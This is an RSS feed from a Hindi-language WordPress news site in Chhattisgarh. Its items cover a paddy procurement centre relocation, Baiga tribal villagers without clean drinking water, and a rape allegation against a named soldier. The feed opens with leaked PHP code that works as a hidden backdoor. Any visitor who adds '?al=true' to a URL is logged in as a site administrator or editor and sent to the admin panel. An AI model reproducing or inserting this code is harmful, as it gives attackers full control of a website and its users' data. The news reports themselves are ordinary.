// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Gaurela Pendra Marwahi – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 17 Nov 2025 10:37:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 गौरेला पेंड्रा मरवाही : किसानों की सुविधा और उपार्जित धान के समुचित रख रखाव हेतु धान खरीदी केंद्र बंशीताल का स्थान परिवर्तित कर करगीकला किया गया https://pratyushaashakinayikiran.com/?p=191900 Mon, 17 Nov 2025 10:37:00 +0000 https://pratyushaashakinayikiran.com/?p=191900  

  गौरेला पेंड्रा मरवाही,

 

खरीफ विपणन वर्ष 2025-26 में समर्थन मूल्य पर किसानों से धान खरीदी के लिए जिले में 20 उपार्जन केंद्र बनाए गए हैं। धान उपार्जन केंद्र बंशीताल में उचित व्यवस्था नहीं होने के कारण किसानों की सुविधा और उपार्जित धान के समुचित रख रखाव को ध्यान में रखते हुए राज्य शासन द्वारा जारी धान उपार्जन नीति के तहत धान उपर्जान केंद्र बंशीताल का स्थान परिवर्तित कर समीप के ग्राम पंचायत करगीकला के खसरा नंबर 825, रकबा 1.870 हेक्टेयर भूमि पर स्थानांतरित किया गया है। इस आशय का आदेश कलेक्टर द्वारा 14 नवंबर 2025 को जारी कर दिया गया है।

]]>
गौरेला पेंड्रा मरवाही में कुआं-हैंडपंप न होने से राष्ट्रपति के दत्तक पुत्र बेहाल, साफ पानी देने से जिम्मेदारों ने मुंह मोड़ा https://pratyushaashakinayikiran.com/?p=37396 Mon, 03 Jun 2024 15:56:00 +0000 https://pratyushaashakinayikiran.com/?p=37396 गौरेला पेंड्रा मरवाही.

गौरेला पेंड्रा मरवाही जिले में राष्ट्रपति के दत्तक पुत्र कहे जाने वाले बैगा आदिवासियों का बुरा हाल है। गौरेला जनपद पंचायत के ठाड़पथरा, आमानाला, दुर्गाधारा क्षेत्र में रहने वाले राष्ट्रपति के दत्तक पुत्र बैगा आदिवासी आज भी शुद्ध पानी के लिए तरस रहे हैं उनकी स्थिति ऐसी है जैसे कि वे पाषाण युग में जीवन जी रहे हों। जहां पर वे रहते है वहां पर न पहुंच मार्ग है न पक्की सड़क, न ही शुद्ध पानी, न कुआं, न हैंडपंप।

यही हाल है इनका अमरकंटक की तराई में बसे बैगा आदिवासियों का। मैकल पहाड़ से बहकर आने वाले पहाड़ी नाले के बाजू में छोटा सा गड्ढा खोदकर वर्षों से उसका पानी पीकर जीवन यापन करने को मजबूर है बैगा आदिवासी। जिन गड्ढों से बैगा आदिवासी पानी पीते हैं उन गड्ढे में पेड़ों से गिरे हुए पत्ते सड़ रहे हैं बगल में काई भी जमी हुई है, मतलब बीमारी होने का अंदेशा बना हुआ है पर फिर भी जीवन चलाने के लिए इसी पानी को कपड़े से छान कर बैगा आदिवासी पीते आ रहे हैं, और इसी पानी को दैनिक उपयोग और निस्तारी के लिए करते है। गांव में हैंडपंप भी है पर वह बिगड़ा हुआ है और एक हैंडपंप से लाल पानी आता है जो पीने योग्य नहीं है, इसलिए मजबूरी में यहां पर रहने वाले ग्रामीण इसी तरह पानी पीने को विवश हैं। बरसात के दिनों में जब नाले में बाढ़ आ जाती है तब ये लोग बाढ़ का पानी कम होने के बाद बगल में गड्ढा खोदकर उसी पानी को पीते हैं। जीवन बैगा कहते है कि सालों से वे लोग यही पानी पीने और निस्तारी के लिए उपयोग करते है जिसके चलते खराब पानी पीने से होने वाली प्रमुख बीमारियों का भी खतरा हमेशा बना रहता है ये बात इन बैगा आदिवासियों को भी पता है कि पीने के पानी में गंदगी है पर वर्षों से यही पीते आ रहे हैं इसलिए पी रहे हैं। वहीं बात पहुंच मार्ग की की जाए तो सड़क जैसी कोई चीज यहां पर नजर नहीं आती, मिट्टी की सड़क में बरसात के पानी से सड़क के बीचों बीच में एक से 2 फीट गहरा कटाव हो गया है जो पूरी सड़क की लंबाई में है। जहां सूखे के दिनों में भी चलना बड़ा कठिन है, ग्रामीण कहते हैं की बरसात के दिनों में तो हालत बदतर हो जाती है, पर कभी कोई अधिकारी आता नहीं और अगर आते भी है तो व्यवस्था में कोई सुधार नहीं होता। पिंकी बैगा और उनके मोहल्ले की और महिलाओं की माने तो मोहल्ले में जो हैंडपंप लगा है उसमें पानी गो आता है पर पानी लाल और गंदा रहता है जिसके चलते वो निस्तारी के साथ पीने लायक भी नही रहता संभर सिंह बैगा का कहना है कोई भी उनकी सुनता ही नही है और वे लोग ऐसे ही नाले के बाजू में कच्चा  थोड़ी बनाकर उससे पानी निकालकर पीते है। हमेशा डर भी राहत है पर क्या करे उनकी मजबूरी है जो ये यही पानी पीते हैं। अत्यंत पिछड़े आदिवासी क्षेत्रों में शहरी क्षेत्र की तरह विकास पहुंचाने और उन्हें विकास की मुख्य धारा से जोड़ने के लिए सरकार ने मध्यप्रदेश शासन काल में ही आदिवासी विकास विभाग का गठनकर पेंड्रा में ही परियोजना प्रशासक का कार्यालय स्थापित कराया था जो छत्तीसगढ़ बनने के बाद भी लगातार काम कर रहा है, इस कार्यालय से सिर्फ आदिवासियों के विकास के लिए योजनाएं बनाने और क्रियान्वयन का काम ही कराया जाता पर यह विभाग अब सिर्फ भ्रष्टाचार के आरोपों में ही घिर कर रह गया, इस मामले पर हमने आदिवासी विकास विभाग के परियोजना प्रशासक और सहायक आयुक्त से बात करने की कोशिश की पर बात नहीं हो सकी।

वहीं गौरेला जनपद पंचायत का कार्यक्षेत्र होने की वजह से जनपद पंचायत गौरेला के मुख्य कार्यपालन अधिकारी ने पानी की व्यवस्था के लिए केंद्र सरकार द्वारा चल रही जल जीवन मिशन से पानी पहुंचाने की बात जरूर कहीं ,पर इस योजना के  कोई नामो निशान भी वहां पर नजर नहीं आए, हालांकि जब हमने कुआं और हैंडपंप से पानी पहुंचाने और सड़क मार्ग से जोड़ने के लिए कहा तो साहब ने कहा योजना में है काम होगा, पर कब तक होगा वे बता नहीं सकते ? इससे अंदाजा लगाया जा सकता है की जिम्मेदार कितने जिम्मेदार हैं। वहीं गौरेला जनपद के सीईओ की मानें तो जल जीवन मिशन के तहत वहां पानी पहुचाने का प्लान है पर वो जमीन में कब दिखाई देगा ये खुद उन्है नही पता। बहरहाल बैगा और आदिवासी विकास के नाम पर वर्षों से करोड़ों रुपए की योजनाएं बनती आ रही है पर इसका फायदा इन बैगा आदिवासियों को कितना मिला यह तस्वीरें बयां कर रही हैं वही जिम्मेदार अधिकारियों को इतनी फुर्सत कहां की वे एसी कमरों से निकलकर इन बैगा आदिवासियों के दुख दर्द और तकलीफ को झांके।

]]>
गौरेला में सेना के जवान पर दुष्कर्म का आरोप, शादी से मुकरने पर आरोपी के घर में जबरन रह रही पीड़िता का गर्भपात भी कराया https://pratyushaashakinayikiran.com/?p=35144 Tue, 28 May 2024 14:15:00 +0000 https://pratyushaashakinayikiran.com/?p=35144 गौरेला पेण्ड्रा मरवाही.

गौरेला पेण्ड्रा मरवाही में पेण्ड्रा के झाबर गाव के रहने वाले सेना के जवान पर शादी का झांसा देकर शारीरिक शोषण किये जाने का अपराध दर्ज किया गया है। वहीं पीड़िता के साथ आरोपी सेना के जवान के द्वारा शादी करने के लिए स्टाम्प में लिखापढ़ी किये जाने के बाद भी शादी नहीं करने के चलते पीड़िता आरोपी के घर में जबरिया घुसकर रह रही थी। जिसके कारण पीड़िता के खिलाफ भी पुलिस ने अपराध दर्ज किया है फिलहाल पुलिस दोनों मामले में अपराध दर्जकर मामले की जांच में जुट गई है।

दरअसल पूरा मामला पेंड्रा थानाक्षेत्र के गांव में रहने वाली युवती ने पेण्ड्रा के झाबर गांव में रहने वाले और वर्तमान में  महाराष्ट्र के पुणे में फौज में पदस्थ जवान वीरभद्र सिंह पर शादी का झांसा देकर 3 सालों तक उसका शारीरिक शोषण किये जाने का आरोप लगाया है। जिसके बाद पीड़िता 5 मई से आरोपी जवान के झाबर गांव स्थित घर में डेरा जमा ली है।पीड़िता की माने तो वीरभद्र सिंह के साथ उसका 2020 से संबंध है वो लगातार उसके साथ शारीरिक शोषण करता और जल्द शादी करने का भी बात करता था पीड़िता का कहना है कि वीरभद्र सिंह पेन्द्रों के द्वारा एक बार उसका गर्भपात भी कराया गया था जिसके बारे में वीरभद्र के मां-बाप को पूरी जानकारी थी। इसी बीच उसके माता पिता मुझे अपने घर लाना ले जाना और मेरे घर भी आना-जाना करते थे। और इन्हीं के कहने पर मैं गर्भपात कराने के लिए तैयार हुई, तब वीरभद्र के मां बाप मुझे समाज और पंचायत के बड़े बुजुर्गों के बैठक में शादी करने के लिए 6 माह की समय माग की गई और बकायदा इसके लिए 100 रु के स्टाम्प पेपर 26 मार्च 2023 को नोटरी कराकर दिया गया था। जिसके बाद स्टाम्प में हुई लिखा पढ़ी का समय पूरा होने पर पीड़िता के माँ बाप उनके घर आये तो उनके घर वाले पहचानने से ही इंकार कर दिये और तो और दोनो की शादी करने से भी इकार कर दिया गया। जिसके बाद पीड़िता पिछले 5 मई से मामले में दोषी वीरभद्र सिंह पेन्द्रों के घर मे रह रही थी। जिसके बाद वीरभद्र के पिता ने मामले में पुलिस में शिकायत दर्ज कराई की एक युवती उनके घर मे जबरिया घुसकर राह रही है और उनके बेटे से शादी करने का दवाब बना रही है जिसके बाद पुलिस भी लगातार दोनो पक्ष का काउंसलिग भी कराया पर जब बात नही बनी तो दोनो पक्षो की ओर से मुकदमा दर्ज कर लिया है।

]]>